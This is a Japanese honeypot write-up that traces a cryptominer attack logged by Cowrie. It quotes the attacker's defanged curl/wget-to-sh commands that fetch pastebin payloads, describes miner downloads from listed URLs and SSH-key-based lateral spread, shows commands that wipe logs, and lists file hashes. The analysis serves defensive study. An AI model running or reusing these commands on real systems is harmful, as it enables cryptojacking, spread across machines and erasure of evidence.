4月3日にCowrieに来ていた攻撃を追ってみました。
一番最初にこの攻撃が観測されたのは4月2日4:48(JST)となります。

sshでログインし、以下のコマンドを入力していました。

(curl -fsSL hxxps://pastebin[.]com/raw/v5XC0BJh||wget -q -O- hxxps://pastebin[].]com/raw/v5XC0BJh)|sh >/dev/null 2>&1 &	

それにより、以下のハッシュ値を持つファイルが落ちてきます。
164504ad75f2e714606e986eaea6f869c059fb270e2dd657e63ba88cf633ed43

ファイルの中身は以下のようなものです。

(curl -fsSL hxxps://pastebin[.]com/raw/xmxHzu5P||wget -q -O- hxxps://pastebin[.]com/raw/xmxHzu5P)|sed -e 's/\r//g'|sh

SSHログインし入力したコマンドとほとんど似たようなコマンドが
記載されているファイルが落ちてきていますが、アクセス先が変わっています。
おそらくハニーポット対策として、
ファイルのダウンロードを挟んでいると思われます。

その次には、以下のハッシュ値をもつファイルが落ちてきます。
c588a2c492afbbb730ab6b78c15af63383e92a4ca37ac7c65557c8c835765d2a

ファイルの中身は、CoinMinerのダウンロードと感染拡大を狙うものでした。
大まかな動きを以下に記載します(一部抜粋)

①/tmpフォルダを作成し、権限に
スティキービットを設定しています。
スティキービットを設定することで、どのユーザーからも読み書き実行ができますが、
ファイルの削除は、所有者以外は不可能になります。

mkdir -p /tmp
chmod 1777 /tmp

②各種プロセスを落としています。
合計27個のプロセスを落とそうとしていました。

③curlとcronをインストールします。

apt-get install curl -y||yum install curl -y||apk add curl -y
apt-get install cron -y||yum install crontabs -y||apk add cron -y

④cronサービスを起動しています。

systemctl start crond
systemctl start cron
systemctl start crontab
service start crond
service start cron
service start crontab

⑤環境に合わせてELFファイルをダウンロードします。
このファイルがCoinMiner本体となっています。

64bitマシンの場合
以下のハッシュ値を持つELFファイルをどちらかの宛先からダウンロードします
74becf0d1621ba1f036025cddffc46d4236530d54d1f913a4d0ad488099913c8
・hxxp://sowcar[.]com/t6/696/1554470365x2890174166.jpg
・hxxps://pixeldrain[.]com/api/file/t2D_WbHk

32bitマシンの場合
以下のハッシュ値を持つELFファイルをどちらかの宛先からダウンロードします
bab27f611518dc55b00b1a9287bdb8e059c4f4cc1607444f40e0c45d5842994f
・hxxp://sowcar[.]com/t6/696/1554470400x2890174166.jpg
・hxxps://pixeldrain[.]com/api/file/wl_bHMB1

⑥/root/.ssh/known_hosts、/root/.ssh/id_rsa.pub にあるsshの接続情報を用いて、
他のマシンにアクセスし、以下の宛先からファイルのダウンロードを行います。
hxxps://pastebin[.]com/raw/HdjSc4JR

このファイルの中身は、最初にダウンロードしたファイルと同一のファイルとなります。
ハッシュ値：164504ad75f2e714606e986eaea6f869c059fb270e2dd657e63ba88cf633ed43

⑦最後に、ログファイルの記録を上書きし、削除します。

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron